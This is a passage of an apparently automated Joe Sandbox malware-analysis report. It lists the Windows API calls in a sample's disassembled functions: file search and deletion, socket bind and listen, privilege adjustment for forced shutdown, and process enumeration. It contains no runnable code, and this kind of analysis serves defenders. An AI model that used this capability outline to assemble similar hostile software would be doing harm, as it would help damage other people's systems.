                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                            • String ID:
                                                                            • API String ID: 1737998785-0
                                                                            • Opcode ID: ec92419138fee3a896ddd1a13a2dc6f4c9cfef45a472249dda8758886ce86db2
                                                                            • Instruction ID: c9a48f12cbb0f6fe96f7938bf648445666cb2034f02c5eadf49cc5d6718afd08
                                                                            • Opcode Fuzzy Hash: ec92419138fee3a896ddd1a13a2dc6f4c9cfef45a472249dda8758886ce86db2
                                                                            • Instruction Fuzzy Hash: D6217F752002149FDB10AF68EC09B697BA8FF14711F10C029FA4ADB2A3EB30EC51CB55
                                                                            APIs
                                                                              • Part of subcall function 00804750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00804743,?,?,008037AE,?), ref: 00804770
                                                                              • Part of subcall function 00864A31: GetFileAttributesW.KERNEL32(?,0086370B), ref: 00864A32
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 008638A3
                                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0086394B
                                                                            • MoveFileW.KERNEL32(?,?), ref: 0086395E
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0086397B
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0086399D
                                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 008639B9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 4002782344-1173974218
                                                                            • Opcode ID: 76fa6fc15bfc400de8572f46b86cfcf157f0333d0a0b3deca566a00e69cfb034
                                                                            • Instruction ID: 6b25ce850480e8aa8e0e5ba39cd0898a22387e1732ff58095284d8b9f8d15e5c
                                                                            • Opcode Fuzzy Hash: 76fa6fc15bfc400de8572f46b86cfcf157f0333d0a0b3deca566a00e69cfb034
                                                                            • Instruction Fuzzy Hash: 67514D3180514DAACF05EBA8DD929EDBB79FF15304F600069E406F71A2EB316F09CB62
                                                                            APIs
                                                                              • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0086F440
                                                                            • Sleep.KERNEL32(0000000A), ref: 0086F470
                                                                            • _wcscmp.LIBCMT ref: 0086F484
                                                                            • _wcscmp.LIBCMT ref: 0086F49F
                                                                            • FindNextFileW.KERNEL32(?,?), ref: 0086F53D
                                                                            • FindClose.KERNEL32(00000000), ref: 0086F553
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                            • String ID: *.*
                                                                            • API String ID: 713712311-438819550
                                                                            • Opcode ID: 018befbf657f975582d695dd29047f8d7cb494f208b626a97ed6147137dbeaa4
                                                                            • Instruction ID: b54060951285fb3a72e4105c27a2a701b3725724db73deeb5bf8f11621ec58da
                                                                            • Opcode Fuzzy Hash: 018befbf657f975582d695dd29047f8d7cb494f208b626a97ed6147137dbeaa4
                                                                            • Instruction Fuzzy Hash: F7416C71904219AFDF14EF68EC49AEEBBB4FF05314F104466E915E2292EB30DE84CB51
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            • Opcode ID: b799886d5938455c60a9339ca7633a670e6ef7d884d11f4a9b4174df0ef8651d
                                                                            • Instruction ID: 8c17a6aa1abcc66e8b94a90332dee193a9cbed17045e8707a82b202c7b9c4ea5
                                                                            • Opcode Fuzzy Hash: b799886d5938455c60a9339ca7633a670e6ef7d884d11f4a9b4174df0ef8651d
                                                                            • Instruction Fuzzy Hash: 8D128C70A00609DFDF04DFA9D981AEEB7F9FF88300F104529E846E7291EB35A995CB51
                                                                            APIs
                                                                              • Part of subcall function 00804750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00804743,?,?,008037AE,?), ref: 00804770
                                                                              • Part of subcall function 00864A31: GetFileAttributesW.KERNEL32(?,0086370B), ref: 00864A32
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00863B89
                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00863BD9
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00863BEA
                                                                            • FindClose.KERNEL32(00000000), ref: 00863C01
                                                                            • FindClose.KERNEL32(00000000), ref: 00863C0A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 2649000838-1173974218
                                                                            • Opcode ID: abc99e5829d0d5acd9a0110328cf945639356737fc60ad30c42ad56569d78a96
                                                                            • Instruction ID: e35253530ecb784fc9ded504290b8907c21bc31e22e00a2b7a4cf14681ad1084
                                                                            • Opcode Fuzzy Hash: abc99e5829d0d5acd9a0110328cf945639356737fc60ad30c42ad56569d78a96
                                                                            • Instruction Fuzzy Hash: B2315E314083859BC201EB68DC918AFB7A8FE95314F40492DF5D5D21D1EB21AA09CB63
                                                                            APIs
                                                                              • Part of subcall function 008587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0085882B
                                                                              • Part of subcall function 008587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00858858
                                                                              • Part of subcall function 008587E1: GetLastError.KERNEL32 ref: 00858865
                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 008651F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                            • String ID: $@$SeShutdownPrivilege
                                                                            • API String ID: 2234035333-194228
                                                                            • Opcode ID: 077f183d9143be1a6aec7abcd8f503aae4853b4dfde5be80ee0a2f16b0de75bf
                                                                            • Instruction ID: a7d60b134eba51c72c22bb9bed333e3a7782f1834f5b51e5587f1b7245e3928e
                                                                            • Opcode Fuzzy Hash: 077f183d9143be1a6aec7abcd8f503aae4853b4dfde5be80ee0a2f16b0de75bf
                                                                            • Instruction Fuzzy Hash: 0F012B317916156BF728627CACABFBB7358FB05345F220421FD13E22D2DA511C008690
                                                                            APIs
                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 008762DC
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 008762EB
                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00876307
                                                                            • listen.WSOCK32(00000000,00000005), ref: 00876316
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00876330
                                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00876344
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                                            • String ID:
                                                                            • API String ID: 1279440585-0
                                                                            • Opcode ID: 40dc26e386fbb8b6c337db22c42852f8150e150d98174979974b3098ba23b709
                                                                            • Instruction ID: 84c948961cffa5fd0bc659562d5c0aae2d684c2a8b0919fd630e8c851c8a198f
                                                                            • Opcode Fuzzy Hash: 40dc26e386fbb8b6c337db22c42852f8150e150d98174979974b3098ba23b709
                                                                            • Instruction Fuzzy Hash: 3F21D0706006049FDB10EF68CC45A6EBBA9FF48320F148168E95AE73D6D770ED11CB52
                                                                            APIs
                                                                              • Part of subcall function 00820DB6: std::exception::exception.LIBCMT ref: 00820DEC
                                                                              • Part of subcall function 00820DB6: __CxxThrowException@8.LIBCMT ref: 00820E01
                                                                            • _memmove.LIBCMT ref: 00850258
                                                                            • _memmove.LIBCMT ref: 0085036D
                                                                            • _memmove.LIBCMT ref: 00850414
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 1300846289-0
                                                                            • Opcode ID: 60b4bfc2f581b78d6d801f7b6a9c881815dae6a93c30e8030f716dcd40cb52b3
                                                                            • Instruction ID: fe7fbc4ce159b3f34406fb33bcfc77d00fd6c7679edda5011ab0bc1c309163c7
                                                                            • Opcode Fuzzy Hash: 60b4bfc2f581b78d6d801f7b6a9c881815dae6a93c30e8030f716dcd40cb52b3
                                                                            • Instruction Fuzzy Hash: E002B2B0A00619DFCF04DF68D981AAE7BB5FF84304F148069E806DB395EB35D994CB96
                                                                            APIs
                                                                              • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 008019FA
                                                                            • GetSysColor.USER32(0000000F), ref: 00801A4E
                                                                            • SetBkColor.GDI32(?,00000000), ref: 00801A61
                                                                              • Part of subcall function 00801290: DefDlgProcW.USER32(?,00000020,?), ref: 008012D8
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ColorProc$LongWindow
                                                                            • String ID:
                                                                            • API String ID: 3744519093-0
                                                                            • Opcode ID: cfbdf5cd8f2e04de66392df85e5cac7126699dc6ff121df4f62c3e776e58293e
                                                                            • Instruction ID: 488c647a4c0fcef4aa53a67b87c324649223aeeb94dfbcf8ed4a78b5a18f91c9
                                                                            • Opcode Fuzzy Hash: cfbdf5cd8f2e04de66392df85e5cac7126699dc6ff121df4f62c3e776e58293e
                                                                            • Instruction Fuzzy Hash: 97A158B1212568BEEF79AB6C8C5CE7F395CFB81769F14011AF602D61D2DB209D4093B2
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0086BCE6
                                                                            • _wcscmp.LIBCMT ref: 0086BD16
                                                                            • _wcscmp.LIBCMT ref: 0086BD2B
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0086BD3C
                                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0086BD6C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File_wcscmp$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 2387731787-0
                                                                            • Opcode ID: 1038abbaee96f1ad318146a95361a1a3cf58c793b0096eecc358ce77fe3d506f
                                                                            • Instruction ID: 4a938064fa250c41f8c57d4f4699e90c9bf521ac67c36ec0784a9790460df43f
                                                                            • Opcode Fuzzy Hash: 1038abbaee96f1ad318146a95361a1a3cf58c793b0096eecc358ce77fe3d506f
                                                                            • Instruction Fuzzy Hash: 8D519E756046019FC714DF28D890E9AB3E4FF49328F11462DEA56CB3A2DB30ED44CB92
                                                                            APIs
                                                                              • Part of subcall function 00877D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00877DB6
                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0087679E
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 008767C7
                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00876800
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0087680D
                                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00876821
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 99427753-0
                                                                            • Opcode ID: e5119851ace8896fefc78656496b34773353d292484ab8bd54607b229abcc26d
                                                                            • Instruction ID: 18f534087b3e1c68dfb9240218cfc3b90e577338ce2e53644526bf9297c6770e
                                                                            • Opcode Fuzzy Hash: e5119851ace8896fefc78656496b34773353d292484ab8bd54607b229abcc26d
                                                                            • Instruction Fuzzy Hash: 8641B475600614AFDB90AF288C86F6E77A8FF45754F04C568FA99EB3C3DA709D008792
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                            • String ID:
                                                                            • API String ID: 292994002-0
                                                                            • Opcode ID: b54226e31160b969190ef7738b4dc44dedd877d1ff79a0352b8b901c40f670cb
                                                                            • Instruction ID: e29425127d7b91ff0a94f5e37b75eeaa898bf358b1677887daaeddddb5b54549
                                                                            • Opcode Fuzzy Hash: b54226e31160b969190ef7738b4dc44dedd877d1ff79a0352b8b901c40f670cb
                                                                            • Instruction Fuzzy Hash: 9A11E771300911AFEB217F2ADC44A6E7B99FF457A1B408438F945D3342DB70DD0187A5
                                                                            APIs
                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008580C0
                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008580CA
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008580D9
                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008580E0
                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008580F6
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 44706859-0
                                                                            • Opcode ID: 2b3c96d036781a0eee559104f79ba26b32971cfef3b996ff5cb703ea0d0a495b
                                                                            • Instruction ID: 97376fd5a3fc7eeb3e087e33b450205f477fbfcb3593e9092c900bf8f8d881dc
                                                                            • Opcode Fuzzy Hash: 2b3c96d036781a0eee559104f79ba26b32971cfef3b996ff5cb703ea0d0a495b
                                                                            • Instruction Fuzzy Hash: 78F06235280704EFEB114FA9EC8DE673BACFF49755F100026FA45D6151DB619C45DB60
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 0086C432
                                                                            • CoCreateInstance.OLE32(00892D6C,00000000,00000001,00892BDC,?), ref: 0086C44A
                                                                              • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                                            • CoUninitialize.OLE32 ref: 0086C6B7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                            • String ID: .lnk
                                                                            • API String ID: 2683427295-24824748
                                                                            • Opcode ID: 187351e2fc0c010ead62a073cf04ae725c437db79b91a00e4df4563e833cf8fc
                                                                            • Instruction ID: d31c176cdaf6069543c4937eeac06745050f772adc6a2d5149f79187079f0016
                                                                            • Opcode Fuzzy Hash: 187351e2fc0c010ead62a073cf04ae725c437db79b91a00e4df4563e833cf8fc
                                                                            • Instruction Fuzzy Hash: 91A139B1104205AFD740EF58CC81EABB7E8FF95354F00492DF595C72A2EB71AA49CB62
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00804AD0), ref: 00804B45
                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00804B57
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                            • API String ID: 2574300362-192647395
                                                                            • Opcode ID: a2dc6c3f80a40bc974b1b11382852a3ffcbd98ed865185bf325065046d9d5d93
                                                                            • Instruction ID: 2617578ce70307da1f1cd7e127bf16967192bc0e383279003a3beacc531665aa
                                                                            • Opcode Fuzzy Hash: a2dc6c3f80a40bc974b1b11382852a3ffcbd98ed865185bf325065046d9d5d93
                                                                            • Instruction Fuzzy Hash: F7D0C274A00313CFC720AF75DC28B0272D4FF00360B1088399691D22A0D678D880C714
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: __itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 674341424-0
                                                                            • Opcode ID: 35ce72f2e06d8c365a7b17763fb2bbcd4b7b56d9cdac8dcd76024bff6f3a1f3b
                                                                            • Instruction ID: d91ad1df446a46d448fd620803d062ef6fbd85d29fe5835c0136ae3ee8cb35ed
                                                                            • Opcode Fuzzy Hash: 35ce72f2e06d8c365a7b17763fb2bbcd4b7b56d9cdac8dcd76024bff6f3a1f3b
                                                                            • Instruction Fuzzy Hash: 592258716083049BD724DF18D881BAAB7E8FF85314F10492DF99AD7291EB71E984CB93
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0087EE3D
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0087EE4B
                                                                              • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0087EF0B
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0087EF1A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
